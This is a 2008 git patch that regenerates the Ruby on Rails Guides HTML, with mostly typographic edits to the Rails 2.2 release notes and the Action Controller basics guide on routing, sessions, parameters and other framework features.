From fa6218c923bd023aac2a502bb34e4541eb82f7e4 Mon Sep 17 00:00:00 2001 From: Mike Gunderloy Date: Sat, 27 Dec 2008 16:15:52 -0600 Subject: Regenerate Guides HTML --- railties/doc/guides/html/2_2_release_notes.html | 230 ++- .../doc/guides/html/actioncontroller_basics.html | 290 ++-- .../html/activerecord_validations_callbacks.html | 328 ++--- railties/doc/guides/html/association_basics.html | 833 +++++------ railties/doc/guides/html/authors.html | 12 +- .../guides/html/benchmarking_and_profiling.html | 267 ++-- railties/doc/guides/html/caching_with_rails.html | 163 +-- railties/doc/guides/html/command_line.html | 239 ++- railties/doc/guides/html/configuring.html | 146 +- railties/doc/guides/html/creating_plugins.html | 478 +++--- .../guides/html/debugging_rails_applications.html | 277 ++-- railties/doc/guides/html/finders.html | 560 ++++--- railties/doc/guides/html/form_helpers.html | 206 ++- .../guides/html/getting_started_with_rails.html | 509 +++---- railties/doc/guides/html/i18n.html | 875 +++++------ railties/doc/guides/html/index.html | 51 +- .../doc/guides/html/layouts_and_rendering.html | 642 ++++---- railties/doc/guides/html/migrations.html | 273 ++-- railties/doc/guides/html/routing_outside_in.html | 517 +++---- railties/doc/guides/html/security.html | 571 ++++---- .../guides/html/testing_rails_applications.html | 1545 ++++++++++++-------- 21 files changed, 4527 insertions(+), 4485 deletions(-) diff --git a/railties/doc/guides/html/2_2_release_notes.html b/railties/doc/guides/html/2_2_release_notes.html index 778144b688..b886df7aca 100644 --- a/railties/doc/guides/html/2_2_release_notes.html +++ b/railties/doc/guides/html/2_2_release_notes.html @@ -292,16 +292,16 @@ ul#navMain {

Ruby on Rails 2.2 Release Notes

-

Rails 2.2 delivers a number of new and improved features. This list covers the major upgrades, but doesn't include every little bug fix and change. If you want to see everything, check out the list of commits in the main Rails repository on GitHub.

-

Along with Rails, 2.2 marks the launch of the Ruby on Rails Guides, the first results of the ongoing Rails Guides hackfest. This site will deliver high-quality documentation of the major features of Rails.

+

Rails 2.2 delivers a number of new and improved features. This list covers the major upgrades, but doesn’t include every little bug fix and change. If you want to see everything, check out the list of commits in the main Rails repository on GitHub.

+

Along with Rails, 2.2 marks the launch of the Ruby on Rails Guides, the first results of the ongoing Rails Guides hackfest. This site will deliver high-quality documentation of the major features of Rails.

1. Infrastructure

-

Rails 2.2 is a significant release for the infrastructure that keeps Rails humming along and connected to the rest of the world.

+

Rails 2.2 is a significant release for the infrastructure that keeps Rails humming along and connected to the rest of the world.

1.1. Internationalization

-

Rails 2.2 supplies an easy system for internationalization (or i18n, for those of you tired of typing).

-
    +

    Rails 2.2 supplies an easy system for internationalization (or i18n, for those of you tired of typing).

    +
    • Lead Contributors: Rails i18 Team @@ -311,7 +311,7 @@ Lead Contributors: Rails i18 Team

      More information :

      -
        +

        1.2. Compatibility with Ruby 1.9 and JRuby

        -

        Along with thread safety, a lot of work has been done to make Rails work well with JRuby and the upcoming Ruby 1.9. With Ruby 1.9 being a moving target, running edge Rails on edge Ruby is still a hit-or-miss proposition, but Rails is ready to make the transition to Ruby 1.9 when the latter is released.

        +

        Along with thread safety, a lot of work has been done to make Rails work well with JRuby and the upcoming Ruby 1.9. With Ruby 1.9 being a moving target, running edge Rails on edge Ruby is still a hit-or-miss proposition, but Rails is ready to make the transition to Ruby 1.9 when the latter is released.

      2. Documentation

      -

      The internal documentation of Rails, in the form of code comments, has been improved in numerous places. In addition, the Ruby on Rails Guides project is the definitive source for information on major Rails components. In its first official release, the Guides page includes:

      -
        +

        The internal documentation of Rails, in the form of code comments, has been improved in numerous places. In addition, the Ruby on Rails Guides project is the definitive source for information on major Rails components. In its first official release, the Guides page includes:

        +
        -

        All told, the Guides provide tens of thousands of words of guidance for beginning and intermediate Rails developers.

        -

        If you want to generate these guides locally, inside your application:

        +

        All told, the Guides provide tens of thousands of words of guidance for beginning and intermediate Rails developers.

        +

        If you want to generate these guides locally, inside your application:

        -
        rake doc:guides
        -
        -

        This will put the guides inside RAILS_ROOT/doc/guides and you may start surfing straight away by opening RAILS_ROOT/doc/guides/index.html in your favourite browser.

        -
          +
          rake doc:guides
      +

      This will put the guides inside RAILS_ROOT/doc/guides and you may start surfing straight away by opening RAILS_ROOT/doc/guides/index.html in your favourite browser.

      +
      • Lead Contributors: Rails Documentation Team @@ -433,7 +432,7 @@ Major contributions from Xav

        More information:

        -
          +

          3. Better integration with HTTP : Out of the box ETag support

          -

          Supporting the etag and last modified timestamp in HTTP headers means that Rails can now send back an empty response if it gets a request for a resource that hasn't been modified lately. This allows you to check whether a response needs to be sent at all.

          +

          Supporting the etag and last modified timestamp in HTTP headers means that Rails can now send back an empty response if it gets a request for a resource that hasn’t been modified lately. This allows you to check whether a response needs to be sent at all.

          # instead of rendering the template. fresh_when(:last_modified => @article.published_at.utc, :etag => @article) end -end -
          +end

      4. Thread Safety

      -

      The work done to make Rails thread-safe is rolling out in Rails 2.2. Depending on your web server infrastructure, this means you can handle more requests with fewer copies of Rails in memory, leading to better server performance and higher utilization of multiple cores.

      -

      To enable multithreaded dispatching in production mode of your application, add the following line in your config/environments/production.rb:

      +

      The work done to make Rails thread-safe is rolling out in Rails 2.2. Depending on your web server infrastructure, this means you can handle more requests with fewer copies of Rails in memory, leading to better server performance and higher utilization of multiple cores.

      +

      To enable multithreaded dispatching in production mode of your application, add the following line in your config/environments/production.rb:

      -
      config.threadsafe!
      -
      -
        +
        config.threadsafe!
      +
      • More information :

        -
          +

          5. Active Record

          -

          There are two big additions to talk about here: transactional migrations and pooled database transactions. There's also a new (and cleaner) syntax for join table conditions, as well as a number of smaller improvements.

          +

          There are two big additions to talk about here: transactional migrations and pooled database transactions. There’s also a new (and cleaner) syntax for join table conditions, as well as a number of smaller improvements.

          5.1. Transactional Migrations

          -

          Historically, multiple-step Rails migrations have been a source of trouble. If something went wrong during a migration, everything before the error changed the database and everything after the error wasn't applied. Also, the migration version was stored as having been executed, which means that it couldn't be simply rerun by rake db:migrate:redo after you fix the problem. Transactional migrations change this by wrapping migration steps in a DDL transaction, so that if any of them fail, the entire migration is undone. In Rails 2.2, transactional migrations are supported on PostgreSQL out of the box. The code is extensible to other database types in the future - and IBM has already extended it to support the DB2 adapter.

          -
            +

            Historically, multiple-step Rails migrations have been a source of trouble. If something went wrong during a migration, everything before the error changed the database and everything after the error wasn’t applied. Also, the migration version was stored as having been executed, which means that it couldn’t be simply rerun by rake db:migrate:redo after you fix the problem. Transactional migrations change this by wrapping migration steps in a DDL transaction, so that if any of them fail, the entire migration is undone. In Rails 2.2, transactional migrations are supported on PostgreSQL out of the box. The code is extensible to other database types in the future - and IBM has already extended it to support the DB2 adapter.

            +
            • Lead Contributor: Adam Wiggins @@ -538,7 +535,7 @@ Lead Contributor: Adam Wiggins

              More information:

              -
                +

                5.2. Connection Pooling

                -

                Connection pooling lets Rails distribute database requests across a pool of database connections that will grow to a maximum size (by default 5, but you can add a pool key to your database.yml to adjust this). This helps remove bottlenecks in applications that support many concurrent users. There's also a wait_timeout that defaults to 5 seconds before giving up. ActiveRecord::Base.connection_pool gives you direct access to the pool if you need it.

                +

                Connection pooling lets Rails distribute database requests across a pool of database connections that will grow to a maximum size (by default 5, but you can add a pool key to your database.yml to adjust this). This helps remove bottlenecks in applications that support many concurrent users. There’s also a wait_timeout that defaults to 5 seconds before giving up. ActiveRecord::Base.connection_pool gives you direct access to the pool if you need it.

                username: root database: sample_development pool: 10 - wait_timeout: 10 -
                -
                  + wait_timeout: 10
              +
              • Lead Contributor: Nick Sieger @@ -576,17 +572,17 @@ Lead Contributor: Nick Sieger

                More information:

                -

                5.3. Hashes for Join Table Conditions

                -

                You can now specify conditions on join tables using a hash. This is a big help if you need to query across complex joins.

                +

                You can now specify conditions on join tables using a hash. This is a big help if you need to query across complex joins.

                end # Get all products with copyright-free photos: -Product.all(:joins => :photos, :conditions => { :photos => { :copyright => false }}) -
                -
                  +Product.all(:joins => :photos, :conditions => { :photos => { :copyright => false }})
              +
              • More information:

                -

                5.4. New Dynamic Finders

                -

                Two new sets of methods have been added to Active Record's dynamic finders family.

                +

                Two new sets of methods have been added to Active Record’s dynamic finders family.

                5.4.1. find_last_by_<attribute>

                -

                The find_last_by_<attribute> method is equivalent to Model.last(:conditions ⇒ {:attribute ⇒ value})

                +

                The find_last_by_<attribute> method is equivalent to Model.last(:conditions => {:attribute => value})

                # Get the last user who signed up from London
                -User.find_last_by_city('London')
                -
                -
                  +User.find_last_by_city('London')
              + +

              5.5. Associations Respect Private/Protected Scope

              -

              Active Record association proxies now respect the scope of methods on the proxied object. Previously (given User has_one :account) @user.account.private_method would call the private method on the associated Account object. That fails in Rails 2.2; if you need this functionality, you should use @user.account.send(:private_method) (or make the method public instead of private or protected). Please note that if you're overriding method_missing, you should also override respond_to to match the behavior in order for associations to function normally.

              -
                +

                Active Record association proxies now respect the scope of methods on the proxied object. Previously (given User has_one :account) @user.account.private_method would call the private method on the associated Account object. That fails in Rails 2.2; if you need this functionality, you should use @user.account.send(:private_method) (or make the method public instead of private or protected). Please note that if you’re overriding method_missing, you should also override respond_to to match the behavior in order for associations to function normally.

                +
                • Lead Contributor: Adam Milligan @@ -665,7 +658,7 @@ Lead Contributor: Adam Milligan

                  More information:

                  -
                    +

                    5.6. Other ActiveRecord Changes

                    -
                      +
                      • rake db:migrate:redo now accepts an optional VERSION to target that specific migration to redo @@ -688,7 +681,7 @@ Set config.active_record.timestamped_migrations = false to have migrati

                      • -Counter cache columns (for associations declared with :counter_cache ⇒ true) do not need to be initialized to zero any longer. +Counter cache columns (for associations declared with :counter_cache => true) do not need to be initialized to zero any longer.

                      • @@ -700,9 +693,9 @@ Counter cache columns (for associations declared with :counter_cache ⇒

                      6. Action Controller

                      -

                      On the controller side, there are several changes that will help tidy up your routes. There are also some internal changes in the routing engine to lower memory usage on complex applications.

                      +

                      On the controller side, there are several changes that will help tidy up your routes. There are also some internal changes in the routing engine to lower memory usage on complex applications.

                      6.1. Shallow Route Nesting

                      -

                      Shallow route nesting provides a solution to the well-known difficulty of using deeply-nested resources. With shallow nesting, you need only supply enough information to uniquely identify the resource that you want to work with.

                      +

                      Shallow route nesting provides a solution to the well-known difficulty of using deeply-nested resources. With shallow nesting, you need only supply enough information to uniquely identify the resource that you want to work with.

                      publisher.resources :magazines do |magazine| magazine.resources :photos end -end -
                      -

                      This will enable recognition of (among others) these routes:

                      +end
                    +

                    This will enable recognition of (among others) these routes:

                    /publishers/1           ==> publisher_path(1)
                    @@ -723,7 +715,7 @@ http://www.gnu.org/software/src-highlite -->
                     /magazines/2/photos     ==> magazines_photos_path(2)
                     /photos/3               ==> photo_path(3)
                    -
                      +
                      • Lead Contributor: S. Brent Faulkner @@ -733,7 +725,7 @@ Lead Contributor: S. Brent Faulkner

                        More information:

                        -

                        6.2. Method Arrays for Member or Collection Routes

                        -

                        You can now supply an array of methods for new member or collection routes. This removes the annoyance of having to define a route as accepting any verb as soon as you need it to handle more than one. With Rails 2.2, this is a legitimate route declaration:

                        +

                        You can now supply an array of methods for new member or collection routes. This removes the annoyance of having to define a route as accepting any verb as soon as you need it to handle more than one. With Rails 2.2, this is a legitimate route declaration:

                        -
                        map.resources :photos, :collection => { :search => [:get, :post] }
                        -
                        -
                          +
                          map.resources :photos, :collection => { :search => [:get, :post] }
                      +

                      6.3. Resources With Specific Actions

                      -

                      By default, when you use map.resources to create a route, Rails generates routes for seven default actions (index, show, create, new, edit, update, and destroy). But each of these routes takes up memory in your application, and causes Rails to generate additional routing logic. Now you can use the :only and :except options to fine-tune the routes that Rails will generate for resources. You can supply a single action, an array of actions, or the special :all or :none options. These options are inherited by nested resources.

                      +

                      By default, when you use map.resources to create a route, Rails generates routes for seven default actions (index, show, create, new, edit, update, and destroy). But each of these routes takes up memory in your application, and causes Rails to generate additional routing logic. Now you can use the :only and :except options to fine-tune the routes that Rails will generate for resources. You can supply a single action, an array of actions, or the special :all or :none options. These options are inherited by nested resources.

                      map.resources :photos, :only => [:index, :show]
                      -map.resources :products, :except => :destroy
                      -
                      -
                        +map.resources :products, :except => :destroy
                    +

                    6.4. Other Action Controller Changes

                    -
                      +
                      • You can now easily show a custom error page for exceptions raised while routing a request. @@ -826,7 +816,7 @@ Polymorphic URLs behave more sensibly if a passed parameter is nil. For example,

                      7. Action View

                      -
                        +
                        • javascript_include_tag and stylesheet_link_tag support a new :recursive option to be used along with :all, so that you can load an entire tree of files with a single line of code. @@ -839,7 +829,7 @@ The included Prototype javascript library has been upgraded to version 1.6.0.3.

                        • -RJS#page.reload to reload the browser's current location via javascript +RJS#page.reload to reload the browser’s current location via javascript

                        • @@ -851,28 +841,28 @@ The atom_feed helper now takes an :instruct option to let you

                        8. Action Mailer

                        -

                        Action Mailer now supports mailer layouts. You can make your HTML emails as pretty as your in-browser views by supplying an appropriately-named layout - for example, the CustomerMailer class expects to use layouts/customer_mailer.html.erb.

                        -
                          +

                          Action Mailer now supports mailer layouts. You can make your HTML emails as pretty as your in-browser views by supplying an appropriately-named layout - for example, the CustomerMailer class expects to use layouts/customer_mailer.html.erb.

                          +

                          9. Active Support

                          -

                          Active Support now offers built-in memoization for Rails applications, the each_with_object method, prefix support on delegates, and various other new utility methods.

                          +

                          Active Support now offers built-in memoization for Rails applications, the each_with_object method, prefix support on delegates, and various other new utility methods.

                          9.1. Memoization

                          -

                          Memoization is a pattern of initializing a method once and then stashing its value away for repeat use. You've probably used this pattern in your own applications:

                          +

                          Memoization is a pattern of initializing a method once and then stashing its value away for repeat use. You’ve probably used this pattern in your own applications:

                          def full_name
                             @full_name ||= "#{first_name} #{last_name}"
                          -end
                          -
                          -

                          Memoization lets you handle this task in a declarative fashion:

                          +end
                        +

                        Memoization lets you handle this task in a declarative fashion:

                        def full_name "#{first_name} #{last_name}" end -memoize :full_name -
                        -

                        Other features of memoization include unmemoize, unmemoize_all, and memoize_all to turn memoization on or off.

                        -
                          +memoize :full_name
                        +

                        Other features of memoization include unmemoize, unmemoize_all, and memoize_all to turn memoization on or off.

                        +
                        • Lead Contributor: Josh Peek @@ -906,10 +894,10 @@ Lead Contributor: Josh Peek

                          More information:

                          -
                            +

                            9.2. each_with_object

                            -

                            The each_with_object method provides an alternative to inject, using a method backported from Ruby 1.9. It iterates over a collection, passing the current element and the memo into the block.

                            +

                            The each_with_object method provides an alternative to inject, using a method backported from Ruby 1.9. It iterates over a collection, passing the current element and the memo into the block.

                            -
                            %w(foo bar).each_with_object({}) { |str, hsh| hsh[str] = str.upcase } #=> {'foo' => 'FOO', 'bar' => 'BAR'}
                            -
                            -

                            Lead Contributor: Adam Keys

                            +
                            %w(foo bar).each_with_object({}) { |str, hsh| hsh[str] = str.upcase } #=> {'foo' => 'FOO', 'bar' => 'BAR'}
                        +

                        Lead Contributor: Adam Keys

                        9.3. Delegates With Prefixes

                        -

                        If you delegate behavior from one class to another, you can now specify a prefix that will be used to identify the delegated methods. For example:

                        +

                        If you delegate behavior from one class to another, you can now specify a prefix that will be used to identify the delegated methods. For example:

                        class Vendor < ActiveRecord::Base
                           has_one :account
                           delegate :email, :password, :to => :account, :prefix => true
                        -end
                        -
                        -

                        This will produce delegated methods vendor#account_email and vendor#account_password. You can also specify a custom prefix:

                        +end
                      +

                      This will produce delegated methods vendor#account_email and vendor#account_password. You can also specify a custom prefix:

                      class Vendor < ActiveRecord::Base
                         has_one :account
                         delegate :email, :password, :to => :account, :prefix => :owner
                      -end
                      -
                      -

                      This will produce delegated methods vendor#owner_email and vendor#owner_password.

                      -

                      Lead Contributor: Daniel Schierbeck

                      +end
                  +

                  This will produce delegated methods vendor#owner_email and vendor#owner_password.

                  +

                  Lead Contributor: Daniel Schierbeck

                  9.4. Other Active Support Changes

                  -
                    +
                    • Extensive updates to ActiveSupport::Multibyte, including Ruby 1.9 compatibility fixes. @@ -999,17 +984,17 @@ The included TzInfo library has been upgraded to version 0.3.12.

                    • -ActiveSuport::StringInquirer gives you a pretty way to test for equality in strings: ActiveSupport::StringInquirer.new("abc").abc? ⇒ true +ActiveSuport::StringInquirer gives you a pretty way to test for equality in strings: ActiveSupport::StringInquirer.new("abc").abc? => true

                  10. Railties

                  -

                  In Railties (the core code of Rails itself) the biggest changes are in the config.gems mechanism.

                  +

                  In Railties (the core code of Rails itself) the biggest changes are in the config.gems mechanism.

                  10.1. config.gems

                  -

                  To avoid deployment issues and make Rails applications more self-contained, it's possible to place copies of all of the gems that your Rails application requires in /vendor/gems. This capability first appeared in Rails 2.1, but it's much more flexible and robust in Rails 2.2, handling complicated dependencies between gems. Gem management in Rails includes these commands:

                  -
                    +

                    To avoid deployment issues and make Rails applications more self-contained, it’s possible to place copies of all of the gems that your Rails application requires in /vendor/gems. This capability first appeared in Rails 2.1, but it’s much more flexible and robust in Rails 2.2, handling complicated dependencies between gems. Gem management in Rails includes these commands:

                    +
                    • config.gem gem_name in your config/environment.rb file @@ -1046,8 +1031,8 @@ The included TzInfo library has been upgraded to version 0.3.12.

                    -

                    You can unpack or install a single gem by specifying GEM=gem_name on the command line.

                    -
                      +

                      You can unpack or install a single gem by specifying GEM=gem_name on the command line.

                      +
                      • Lead Contributor: Matt Jones @@ -1057,10 +1042,10 @@ Lead Contributor: Matt Jones

                        More information:

                        -
                          +

                          10.2. Other Railties Changes

                          -
                            +
                            • -If you're a fan of the Thin web server, you'll be happy to know that script/server now supports Thin directly. +If you’re a fan of the Thin web server, you’ll be happy to know that script/server now supports Thin directly.

                            • @@ -1090,7 +1075,7 @@ If you're a fan of the Thin web
                            • -script/console now supports a —debugger option +script/console now supports a --debugger option

                            • @@ -1117,8 +1102,8 @@ To eliminate deprecation warnings and properly handle gem dependencies, Rails no

                            11. Deprecated

                            -

                            A few pieces of older code are deprecated in this release:

                            -
                              +

                              A few pieces of older code are deprecated in this release:

                              +
                              • Rails::SecretKeyGenerator has been replaced by ActiveSupport::SecureRandom @@ -1126,7 +1111,7 @@ To eliminate deprecation warnings and properly handle gem dependencies, Rails no

                              • -render_component is deprecated. There's a render_components plugin available if you need this functionality. +render_component is deprecated. There’s a render_components plugin available if you need this functionality.

                              • @@ -1143,10 +1128,9 @@ http://www.gnu.org/software/src-highlite -->
                                def partial_with_implicit_local_assignment
                                   @customer = Customer.new("Marcel")
                                   render :partial => "customer"
                                -end
                                -
                            -

                            Previously the above code made available a local variable called customer inside the partial customer. You should explicitly pass all the variables via :locals hash now.

                            -
                              +end
                            +

                            Previously the above code made available a local variable called customer inside the partial customer. You should explicitly pass all the variables via :locals hash now.

                            +
                            • country_select has been removed. See the deprecation page for more information and a plugin replacement. @@ -1174,14 +1158,14 @@ The %s and %d interpolation syntax for internationalization is

                            • -Durations of fractional months or fractional years are deprecated. Use Ruby's core Date and Time class arithmetic instead. +Durations of fractional months or fractional years are deprecated. Use Ruby’s core Date and Time class arithmetic instead.

                          12. Credits

                          -

                          Release notes compiled by Mike Gunderloy

                          +

                          Release notes compiled by Mike Gunderloy

                        diff --git a/railties/doc/guides/html/actioncontroller_basics.html b/railties/doc/guides/html/actioncontroller_basics.html index 4af157d4f7..03485bf66a 100644 --- a/railties/doc/guides/html/actioncontroller_basics.html +++ b/railties/doc/guides/html/actioncontroller_basics.html @@ -293,8 +293,8 @@ ul#navMain {

                        Action Controller basics

                        -

                        In this guide you will learn how controllers work and how they fit into the request cycle in your application. After reading this guide, you will be able to:

                        -
                          +

                          In this guide you will learn how controllers work and how they fit into the request cycle in your application. After reading this guide, you will be able to:

                          +
                          • Follow the flow of a request through a controller @@ -312,17 +312,17 @@ Work with filters to execute code during request processing

                          • -Use Action Controller's built-in HTTP authentication +Use Action Controller’s built-in HTTP authentication

                          • -Stream data directly to the user's browser +Stream data directly to the user’s browser

                          • -Filter sensitive parameters so they do not appear in the application's log +Filter sensitive parameters so they do not appear in the application’s log

                          • @@ -335,9 +335,9 @@ Deal with exceptions that may be raised during request processing

                          1. What Does a Controller do?

                          -

                          Action Controller is the C in MVC. After routing has determined which controller to use for a request, your controller is responsible for making sense of the request and producing the appropriate output. Luckily, Action Controller does most of the groundwork for you and uses smart conventions to make this as straight-forward as possible.

                          -

                          For most conventional RESTful applications, the controller will receive the request (this is invisible to you as the developer), fetch or save data from a model and use a view to create HTML output. If your controller needs to do things a little differently, that's not a problem, this is just the most common way for a controller to work.

                          -

                          A controller can thus be thought of as a middle man between models and views. It makes the model data available to the view so it can display that data to the user, and it saves or updates data from the user to the model.

                          +

                          Action Controller is the C in MVC. After routing has determined which controller to use for a request, your controller is responsible for making sense of the request and producing the appropriate output. Luckily, Action Controller does most of the groundwork for you and uses smart conventions to make this as straight-forward as possible.

                          +

                          For most conventional RESTful applications, the controller will receive the request (this is invisible to you as the developer), fetch or save data from a model and use a view to create HTML output. If your controller needs to do things a little differently, that’s not a problem, this is just the most common way for a controller to work.

                          +

                          A controller can thus be thought of as a middle man between models and views. It makes the model data available to the view so it can display that data to the user, and it saves or updates data from the user to the model.

                          - +
                          @@ -349,7 +349,7 @@ Deal with exceptions that may be raised during request processing

                          2. Methods and Actions

                          -

                          A controller is a Ruby class which inherits from ApplicationController and has methods just like any other class. When your application receives a request, the routing will determine which controller and action to run, then Rails creates an instance of that controller and runs the public method with the same name as the action.

                          +

                          A controller is a Ruby class which inherits from ApplicationController and has methods just like any other class. When your application receives a request, the routing will determine which controller and action to run, then Rails creates an instance of that controller and runs the public method with the same name as the action.

                          def new
                             @client = Client.new
                          -end
                          -
                          -

                          The Layouts & rendering guide explains this in more detail.

                          -

                          ApplicationController inherits from ActionController::Base, which defines a number of helpful methods. This guide will cover some of these, but if you're curious to see what's in there, you can see all of them in the API documentation or in the source itself.

                          +end
                          +

                          The Layouts & rendering guide explains this in more detail.

                          +

                          ApplicationController inherits from ActionController::Base, which defines a number of helpful methods. This guide will cover some of these, but if you’re curious to see what’s in there, you can see all of them in the API documentation or in the source itself.

                          3. Parameters

                          -

                          You will probably want to access data sent in by the user or other parameters in your controller actions. There are two kinds of parameters possible in a web application. The first are parameters that are sent as part of the URL, called query string parameters. The query string is everything after "?" in the URL. The second type of parameter is usually referred to as POST data. This information usually comes from a HTML form which has been filled in by the user. It's called POST data because it can only be sent as part of an HTTP POST request. Rails does not make any distinction between query string parameters and POST parameters, and both are available in the params hash in your controller:

                          +

                          You will probably want to access data sent in by the user or other parameters in your controller actions. There are two kinds of parameters possible in a web application. The first are parameters that are sent as part of the URL, called query string parameters. The query string is everything after "?" in the URL. The second type of parameter is usually referred to as POST data. This information usually comes from a HTML form which has been filled in by the user. It’s called POST data because it can only be sent as part of an HTTP POST request. Rails does not make any distinction between query string parameters and POST parameters, and both are available in the params hash in your controller:

                          end end -end -
                          +end

                          3.1. Hash and Array Parameters

                          -

                          The params hash is not limited to one-dimensional keys and values. It can contain arrays and (nested) hashes. To send an array of values, append "[]" to the key name:

                          +

                          The params hash is not limited to one-dimensional keys and values. It can contain arrays and (nested) hashes. To send an array of values, append "[]" to the key name:

                          GET /clients?ids[]=1&ids[]=2&ids[]=3
                          @@ -436,11 +433,11 @@ http://www.gnu.org/software/src-highlite -->
                          Note The actual URL in this example will be encoded as "/clients?ids%5b%5d=1&ids%5b%5d=2&ids%5b%5b=3" as [ and ] are not allowed in URLs. Most of the time you don't have to worry about this because the browser will take care of it for you, and Rails will decode it back when it receives it, but if you ever find yourself having to send those requests to the server manually you have to keep this in mind.The actual URL in this example will be encoded as "/clients?ids%5b%5d=1&ids%5b%5d=2&ids%5b%5b=3" as [ and ] are not allowed in URLs. Most of the time you don’t have to worry about this because the browser will take care of it for you, and Rails will decode it back when it receives it, but if you ever find yourself having to send those requests to the server manually you have to keep this in mind.
                          -

                          The value of params[:ids] will now be ["1", "2", "3"]. Note that parameter values are always strings; Rails makes no attempt to guess or cast the type.

                          -

                          To send a hash you include the key name inside the brackets:

                          +

                          The value of params[:ids] will now be ["1", "2", "3"]. Note that parameter values are always strings; Rails makes no attempt to guess or cast the type.

                          +

                          To send a hash you include the key name inside the brackets:

                          <form action="/clients" method="post">
                          @@ -450,10 +447,10 @@ http://www.gnu.org/software/src-highlite -->
                             <input type="text" name="client[address][city]" value="Carrot City" />
                           </form>
                          -

                          The value of params[:client] when this form is submitted will be {"name" ⇒ "Acme", "phone" ⇒ "12345", "address" ⇒ {"postcode" ⇒ "12345", "city" ⇒ "Carrot City"}}. Note the nested hash in params[:client][:address].

                          -

                          Note that the params hash is actually an instance of HashWithIndifferentAccess from Active Support which is a subclass of Hash which lets you use symbols and strings interchangeably as keys.

                          +

                          The value of params[:client] when this form is submitted will be {"name" => "Acme", "phone" => "12345", "address" => {"postcode" => "12345", "city" => "Carrot City"}}. Note the nested hash in params[:client][:address].

                          +

                          Note that the params hash is actually an instance of HashWithIndifferentAccess from Active Support which is a subclass of Hash which lets you use symbols and strings interchangeably as keys.

                          3.2. Routing Parameters

                          -

                          The params hash will always contain the :controller and :action keys, but you should use the methods controller_name and action_name instead to access these values. Any other parameters defined by the routing, such as :id will also be available. As an example, consider a listing of clients where the list can show either active or inactive clients. We can add a route which captures the :status parameter in a "pretty" URL:

                          +

                          The params hash will always contain the :controller and :action keys, but you should use the methods controller_name and action_name instead to access these values. Any other parameters defined by the routing, such as :id will also be available. As an example, consider a listing of clients where the list can show either active or inactive clients. We can add a route which captures the :status parameter in a "pretty" URL:

                          # ...
                           map.connect "/clients/:status", :controller => "clients", :action => "index", :foo => "bar"
                          -# ...
                          -
                          -

                          In this case, when a user opens the URL /clients/active, params[:status] will be set to "active". When this route is used, params[:foo] will also be set to "bar" just like it was passed in the query string in the same way params[:action] will contain "index".

                          +# ...
                        +

                        In this case, when a user opens the URL /clients/active, params[:status] will be set to "active". When this route is used, params[:foo] will also be set to "bar" just like it was passed in the query string in the same way params[:action] will contain "index".

                        3.3. default_url_options

                        -

                        You can set global default parameters that will be used when generating URLs with default_url_options. To do this, define a method with that name in your controller:

                        +

                        You can set global default parameters that will be used when generating URLs with default_url_options. To do this, define a method with that name in your controller:

                        class ApplicationController < ActionController::Base
                        @@ -477,12 +473,12 @@ map.connect "/c
                         
                         end
                        -

                        These options will be used as a starting-point when generating, so it's possible they'll be overridden by url_for. Because this method is defined in the controller, you can define it on ApplicationController so it would be used for all URL generation, or you could define it on only one controller for all URLs generated there.

                        +

                        These options will be used as a starting-point when generating, so it’s possible they’ll be overridden by url_for. Because this method is defined in the controller, you can define it on ApplicationController so it would be used for all URL generation, or you could define it on only one controller for all URLs generated there.

                        4. Session

                        -

                        Your application has a session for each user in which you can store small amounts of data that will be persisted between requests. The session is only available in the controller and the view and can use one of a number of different storage mechanisms:

                        -
                          +

                          Your application has a session for each user in which you can store small amounts of data that will be persisted between requests. The session is only available in the controller and the view and can use one of a number of different storage mechanisms:

                          +
                          • CookieStore - Stores everything on the client. @@ -504,20 +500,19 @@ ActiveRecordStore - Stores the data in a database using Active Record.

                          -

                          All session stores use a cookie - this is required and Rails does not allow any part of the session to be passed in any other way (e.g. you can't use the query string to pass a session ID) because of security concerns (it's easier to hijack a session when the ID is part of the URL).

                          -

                          Most stores use a cookie to store the session ID which is then used to look up the session data on the server. The default and recommended store, the CookieStore, does not store session data on the server, but in the cookie itself. The data is cryptographically signed to make it tamper-proof, but it is not encrypted, so anyone with access to it can read its contents but not edit it (Rails will not accept it if it has been edited). It can only store about 4kB of data - much less than the others - but this is usually enough. Storing large amounts of data is discouraged no matter which session store your application uses. You should especially avoid storing complex objects (anything other than basic Ruby objects, the most common example being model instances) in the session, as the server might not be able to reassemble them between requests, which will result in an error. The CookieStore has the added advantage that it does not require any setting up beforehand - Rails will generate a "secret key" which will be used to sign the cookie when you create the application.

                          -

                          Read more about session storage in the Security Guide.

                          -

                          If you need a different session storage mechanism, you can change it in the config/environment.rb file:

                          +

                          All session stores use a cookie - this is required and Rails does not allow any part of the session to be passed in any other way (e.g. you can’t use the query string to pass a session ID) because of security concerns (it’s easier to hijack a session when the ID is part of the URL).

                          +

                          Most stores use a cookie to store the session ID which is then used to look up the session data on the server. The default and recommended store, the CookieStore, does not store session data on the server, but in the cookie itself. The data is cryptographically signed to make it tamper-proof, but it is not encrypted, so anyone with access to it can read its contents but not edit it (Rails will not accept it if it has been edited). It can only store about 4kB of data - much less than the others - but this is usually enough. Storing large amounts of data is discouraged no matter which session store your application uses. You should especially avoid storing complex objects (anything other than basic Ruby objects, the most common example being model instances) in the session, as the server might not be able to reassemble them between requests, which will result in an error. The CookieStore has the added advantage that it does not require any setting up beforehand - Rails will generate a "secret key" which will be used to sign the cookie when you create the application.

                          +

                          Read more about session storage in the Security Guide.

                          +

                          If you need a different session storage mechanism, you can change it in the config/environment.rb file:

                          # Set to one of [:active_record_store, :drb_store, :mem_cache_store, :cookie_store]
                          -config.action_controller.session_store = :active_record_store
                          -
                          +config.action_controller.session_store = :active_record_store

                        4.1. Disabling the Session

                        -

                        Sometimes you don't need a session. In this case, you can turn it off to avoid the unnecessary overhead. To do this, use the session class method in your controller:

                        +

                        Sometimes you don’t need a session. In this case, you can turn it off to avoid the unnecessary overhead. To do this, use the session class method in your controller:

                        class ApplicationController < ActionController::Base
                           session :off
                        -end
                        -
                        -

                        You can also turn the session on or off for a single controller:

                        +end
                      +

                      You can also turn the session on or off for a single controller:

                      # want to turn it on for log in/out. class LoginsController < ActionController::Base session :on -end -
                      -

                      Or even for specified actions:

                      +end
                  +

                  Or even for specified actions:

                  class ProductsController < ActionController::Base
                     session :on, :only => [:create, :update]
                  -end
                  -
                  +end

                4.2. Accessing the Session

                -

                In your controller you can access the session through the session instance method.

                +

                In your controller you can access the session through the session instance method.

                @@ -559,7 +551,7 @@ http://www.gnu.org/software/src-highlite --> There are two session methods, the class and the instance method. The class method which is described above is used to turn the session on and off while the instance method described below is used to access session values.
                -

                Session values are stored using key/value pairs like a hash:

                +

